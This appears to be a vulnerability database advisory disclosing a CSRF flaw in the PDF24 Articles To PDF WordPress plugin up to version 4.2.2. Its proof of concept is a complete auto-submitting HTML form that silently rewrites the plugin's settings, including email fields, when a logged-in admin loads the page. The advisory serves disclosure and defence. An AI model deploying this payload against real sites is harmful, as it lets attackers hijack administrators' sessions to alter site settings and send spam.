WordPress Plugin Vulnerabilities
PDF24 Articles To PDF <= 4.2.2 - Arbitrary Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=pdf24" method="POST"> <input type="text" name="language" value="en"> <input type="text" name="availability" value="public"> <input type="text" name="contentCompression" value="on"> <input type="text" name="docOptionsInUse" value="on"> <input type="text" name="docHeader" value="hacked"> <input type="text" name="docSize" value="A4"> <input type="text" name="docOrientation" value="portrait"> <input type="text" name="docStyle" value=""> <input type="text" name="docDefaultFilename" value=""> <input type="text" name="docHomeFilename" value=""> <input type="text" name="docSingleFilename" value=""> <input type="text" name="docPageFilename" value=""> <input type="text" name="docCategoryFilename" value=""> <input type="text" name="docSearchFilename" value=""> <input type="text" name="emailOptionsInUse" value="on"> <input type="text" name="emailType" value="text/plain"> <input type="text" name="emailSubject" value="hacked"> <input type="text" name="emailFrom" value="hacked"> <input type="text" name="emailText" value="please buy my rolex"> <input type="text" name="cpInUse" value="on"> <input type="text" name="cpDisplayMode" value="bottom"> <input type="text" name="cpStyle" value="default_elbf"> <textarea name="cpCustomStyle">.pdf24Plugin-cp { border:1px solid silver; } .pdf24Plugin-cp input[type="text"] { width:200px; border:1px solid silver; margin:0; padding:2px; } .pdf24Plugin-cp input[type="submit"] { margin:0; padding:2px 10px !important; } .pdf24Plugin-cp form { margin:0; padding:0; } .pdf24Plugin-cp img { height:32px; } .pdf24Plugin-cp span, .pdf24Plugin-cp input, .pdf24Plugin-cp img { vertical-align:middle; } .pdf24Plugin-cp * { font-size:90%; }</textarea> <input type="text" name="sbpInUse" value="on"> <input type="text" name="sbpStyle" value="default_dsbfl"> <textarea name="sbpCustomStyle">.pdf24Plugin-sbp { text-align:center; border: 1px solid silver; padding: 5px; } .pdf24Plugin-sbp-link a { font-weight:bold; } .pdf24Plugin-sbp-bl { font-size:smaller; }</textarea> <input type="text" name="tbpStyle" value="default_dflb"> <textarea name="tbpCustomStyle">.pdf24Plugin-tbp { padding: 3px; width:600px; margin:auto; } .pdf24Plugin-tbp * { font-size: 90%; }</textarea> <input type="text" name="lpStyle" value="default_dfl"> <textarea name="lpCustomStyle">.pdf24Plugin-lp-link a { }</textarea> <input type="text" name="lang-enterEmail" value="Enter email address"> <input type="text" name="lang-send" value="Send"> <input type="text" name="lang-sendArticleAsPDF" value="Send article as PDF"> <input type="text" name="lang-sendArticlesAsPDF" value="Send articles as PDF"> <input type="text" name="lang-downloadArticleAsPDF" value="Download article as PDF"> <input type="text" name="lang-downloadArticlesAsPDF" value="Download articles as PDF"> <input type="text" name="lang-createPDF" value="Create PDF"> <textarea name="docTpl"><html> <head> <base href="{baseUrl}" /> <title>{headline}</title> <meta http-equiv="content-type" content="text/html; charset={charset}" /> <style type="text/css"> {css} </style> </head> <body> <h1><a href="{headlineUrl}">{headline}</a></h1> <div>{content}</div> </body> </html></textarea> <textarea name="docEntryTpl"><div class="bodyPart"> <h2><a href="{url}">{title}</a></h2> <div class="meta">{dateTime} {author}</div> <div class="text">{text}</div> </div></textarea> <input type="text" name="update" value="Save Changes"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-30 (about 1 years ago)
Added
2022-05-30 (about 1 years ago)
Last Updated
2023-02-25 (about 1 years ago)